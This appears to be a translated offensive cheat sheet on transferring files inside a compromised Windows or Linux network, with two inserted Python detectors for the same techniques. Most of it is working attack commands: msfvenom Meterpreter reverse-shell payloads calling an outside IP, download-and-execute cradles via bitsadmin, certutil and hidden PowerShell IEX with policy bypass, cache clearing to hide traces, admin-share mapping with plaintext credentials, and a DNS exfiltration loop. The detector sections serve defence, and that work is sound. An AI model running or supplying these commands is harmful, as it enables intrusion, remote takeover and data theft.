Intranet file transfer
Author: Internet (collected)
Windows
01 FTP
Attacker machine: quickly start an FTP server with Python
pip3 install pyftpdlib
python3 -m pyftpdlib
Target machine:
copy con ftp.txt
open 192.168.78.70 2121
anonymous
anonymous
get pass.txt
quit
(end the copy con input with Ctrl+Z, then run the script with ftp -s:ftp.txt)
02 Bitsadmin
BITSAdmin is a command-line tool that can create download or upload jobs and monitor their progress.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=7777 -f hta-psh > 44.hta
bitsadmin /transfer shell http://139.155.49.43/44.hta C:\windows\temp\44.hta
rundll32.exe url.dll,OpenURL 44.hta
03 Certutil
➢ Download and execute
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=6666 -f exe > 44.exe
certutil.exe -urlcache -split -f http://139.155.49.43/44.exe & start c:\windows\temp\44.exe
➢ Clear the download cache
certutil.exe -urlcache -split -f http://139.155.49.43/44.exe delete
Cache directory: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
04 Powershell
$p = new-object system.net.webclient
$p.DownloadFile("http://xx.xx.xx.xx/file","c:\xxx\xx\file")
powershell $p=new-object system.net.webclient;$p.DownloadFile('http://192.168.1.227/s.txt','s.txt')
powershell (new-object system.net.webclient).downloadfile('http://192.168.1.227/s.txt','s.txt')
powershell Invoke-WebRequest -uri "http://192.168.1.227/s.txt" -OutFile "$env:temp\s.php"
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=8899 -f psh-reflection -o shell.ps1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://139.155.49.43/shell.ps1');shell.ps1"
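The Windows techniques above (scripted ftp, bitsadmin /transfer, certutil -urlcache, rundll32 url.dll,OpenURL, the PowerShell download cradles and net use against C$) all leave a characteristic process command line behind. The following detector is an added example, not code from the original post: it scans process-creation events for those command lines. The tab-separated log layout (time, user, image, command line, as one might export from Windows Event 4688 or Sysmon Event 1), the sample events and the regex rules are all constructed for the demo and are assumptions to tune per environment.

```python
"""Flag the download-and-execute command lines catalogued above in
process-creation logs (bitsadmin, certutil, rundll32 url.dll, PowerShell
cradles, scripted ftp, admin-share mapping).

Added example; not code from the original post. Log layout, sample events
and rules are constructed for the demo.
"""
import re
from collections import Counter
from dataclasses import dataclass

# (rule name, regex over the full command line, why it matters)
RULES = [
    ("ftp-scripted",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I),
     "ftp driven by a script file (the copy con ftp.txt approach)"),
    ("bitsadmin-transfer",
     re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://", re.I),
     "BITS job pulling a file from a URL"),
    ("certutil-urlcache",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I),
     "certutil used as a downloader"),
    ("rundll32-openurl",
     re.compile(r"rundll32(\.exe)?\s+url\.dll\s*,\s*OpenURL\b", re.I),
     "rundll32 url.dll,OpenURL opening a dropped file"),
    ("powershell-download",
     re.compile(r"powershell.*(DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient)", re.I),
     "PowerShell web download cradle"),
    ("powershell-hidden-iex",
     re.compile(r"powershell.*(-w(indowstyle)?\s+hidden|-exec(utionpolicy)?\s+bypass).*\bIEX\b", re.I),
     "hidden window or policy bypass combined with IEX"),
    ("admin-share-map",
     re.compile(r"\bnet(\.exe)?\s+use\b.*\\\\[^\s\\]+\\(?:[a-z]|admin|ipc)\$", re.I),
     "net use against an administrative share (C$, ADMIN$, IPC$)"),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    image: str
    commandline: str


def parse_event(line):
    """Split one log line into its four fields; return None for malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 4:
        return None
    time, user, image, commandline = fields
    return {"time": time, "user": user, "image": image, "commandline": commandline}


def scan(lines):
    """Return one Finding per (event, matching rule); one event can hit several rules."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        for name, pattern, _why in RULES:
            if pattern.search(event["commandline"]):
                findings.append(Finding(name, event["user"], event["image"], event["commandline"]))
    return findings


def rule_counts(findings):
    """Histogram of rule hits, a first triage view."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample events: the command lines from the post plus benign noise.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:01", "CORP\\alice", r"C:\Windows\System32\ftp.exe",
     r"ftp -s:ftp.txt"),
    ("2024-01-01T10:00:05", "CORP\\alice", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer shell http://139.155.49.43/44.hta C:\windows\temp\44.hta"),
    ("2024-01-01T10:00:09", "CORP\\alice", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe url.dll,OpenURL 44.hta"),
    ("2024-01-01T10:01:00", "CORP\\alice", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://139.155.49.43/44.exe"),
    ("2024-01-01T10:02:00", "CORP\\alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://139.155.49.43/shell.ps1')\""),
    ("2024-01-01T10:03:00", "CORP\\alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell Invoke-WebRequest -uri "http://192.168.1.227/s.txt" -OutFile "$env:temp\s.php"'),
    ("2024-01-01T10:04:00", "CORP\\alice", r"C:\Windows\System32\net.exe",
     r'net use k: \\192.168.78.67\c$ "123123" /user:administrator'),
    ("2024-01-01T10:05:00", "CORP\\bob", r"C:\Windows\System32\certutil.exe",
     r"certutil -hashfile C:\Users\bob\setup.msi SHA256"),
    ("2024-01-01T10:06:00", "CORP\\bob", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -c Get-Process"),
    ("2024-01-01T10:07:00", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\svchost.exe",
     r"svchost.exe -k netsvcs"),
]
SAMPLE_LOG = ["\t".join(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.rule}] {f.user}: {f.commandline}")
    print(rule_counts(scan(SAMPLE_LOG)))
```

The benign certutil -hashfile and plain powershell -c Get-Process lines are there on purpose: the rules key on the downloader arguments (a URL together with -urlcache or a download method), not on the binary name alone, which keeps noise down without missing the variants listed above. Pair this with the cache directory mentioned under Certutil for forensic confirmation.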
05 SCP
➢ Download files with SCP
scp root@192.168.78.70:/root/1.hta 1.hta
scp -r root@192.168.78.70:/root/linux/ linux/
➢ Upload files with SCP
scp note3.txt root@192.168.1.227:/tmp/n.txt
scp -r password/ root@192.168.1.227:/tmp/pass/
06 Windows file sharing
➢ net use
net use k: \\192.168.78.67\c$ "123123" /user:administrator
dir \\192.168.78.67\c$
Linux
01 wget
The wget command downloads files from the specified URL.
wget http://192.168.1.227/lan.hta
wget -O x.sh http://192.168.1.227/lan.hta
02 curl
curl is a command-line tool for sending requests to web servers.
03 Netcat
04 SFTP
05 Transferring data over DNS
cat test | xxd -p -c 16 | while read line; do host $line.sau547.dnslog.cn; done
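The loop above encodes the file with xxd -p -c 16 and sends each 32-hex-character chunk as a DNS label, so the resolver log is the place to catch it. The following is an added example, not code from the original post: it groups hex-only first labels by client and parent domain, alerts when enough of them appear, and reassembles the carried bytes (the inverse of the xxd encoding). The query-log format ('time client qname' per line), the sample log, and the thresholds are constructed assumptions; the dnslog-style parent domain in the sample is the one from the command.

```python
"""Detect the hex-in-subdomain exfiltration pattern from the command above in a
resolver query log and reassemble what was carried.

Added example; not code from the original post. Log format, sample queries
and thresholds are constructed for the demo.
"""
import re
from collections import defaultdict

# xxd -p -c 16 emits up to 32 lowercase hex chars per line; allow shorter final chunks.
HEX_LABEL = re.compile(r"^[0-9a-f]{8,64}$")


def parse_query_log(lines):
    """Yield (client, qname) pairs; malformed lines are skipped rather than raised."""
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        yield parts[1], parts[2].lower().rstrip(".")


def group_hex_queries(records, min_queries=3):
    """Group queries whose first label is even-length hex by (client, parent domain).

    Only groups with at least min_queries members are returned, in query order,
    so a single odd-looking hostname does not raise an alert on its own."""
    groups = defaultdict(list)
    for client, qname in records:
        first, sep, parent = qname.partition(".")
        if sep and len(first) % 2 == 0 and HEX_LABEL.match(first):
            groups[(client, parent)].append(first)
    return {key: labels for key, labels in groups.items() if len(labels) >= min_queries}


def reassemble(hex_labels):
    """Inverse of `xxd -p -c 16`: concatenate the chunks and decode them to bytes."""
    return bytes.fromhex("".join(hex_labels))


def detect(lines, min_queries=3):
    """Return one finding per (client, parent domain) that looks like chunked exfiltration."""
    findings = []
    for (client, parent), labels in group_hex_queries(parse_query_log(lines), min_queries).items():
        payload = reassemble(labels)
        findings.append({
            "client": client,
            "parent": parent,
            "queries": len(labels),
            "bytes_carried": len(payload),
            "payload": payload,
        })
    return findings


# Constructed sample log: one host leaking a short text file in three queries, plus noise.
SAMPLE_QUERY_LOG = [
    "12:00:01 10.0.0.5 www.example.com.",
    "12:00:02 10.0.0.5 74686520717569636b2062726f776e20.sau547.dnslog.cn.",
    "12:00:02 10.0.0.5 666f78206a756d7073206f7665722074.sau547.dnslog.cn.",
    "12:00:02 10.0.0.5 6865206c617a7920646f670a.sau547.dnslog.cn.",
    "12:00:03 10.0.0.7 mail.example.com.",
    "12:00:04 10.0.0.9 deadbeef.example.org.",  # hex-looking but alone: below threshold
    "garbage line",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_QUERY_LOG):
        print(f"{f['client']} -> {f['parent']}: {f['queries']} queries, "
              f"{f['bytes_carried']} bytes: {f['payload']!r}")
```

The hex check is tuned to exactly the encoding the command uses; a sender that switches to base32 or base64 labels slips past it, so in production add a label-length or entropy measure per parent domain alongside this rule. The reassembly step is what turns the alert into evidence, since it shows what left the network.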
Scripting languages
01 php
php -r 'file_put_contents("lan.hta",file_get_contents("http://192.168.1.227/lan.hta"));'
file_put_contents — writes a string to a file
file_get_contents — reads an entire file into a string
02 Python
python2 -c "import urllib2;u=urllib2.urlopen('http://192.168.1.227/lan.hta');f=open(r'c:\temp\win.hta','w');f.write(u.read());f.close()"
python3 -c "import urllib.request;u=urllib.request.urlopen('http://192.168.1.227/lan.hta');f=open(r'c:\temp\win.hta','w');f.write(u.read().decode('utf-8'));f.close()"
03 perl
perl -MLWP::Simple -e 'getstore("http://192.168.1.227/Launcher.hta","win.hta")'
04 Ruby
ruby -e "require 'net/http';Net::HTTP.start('192.168.1.227') { |http| r = http.get('/lan.hta');open('/root/rb.hta', 'wb') { |file| file.write(r.body)}}"
Tags: http, 1.227, hta, file transfer, 192.168, file, txt
Source: https://blog.csdn.net/weixin_43873557/article/details/113760777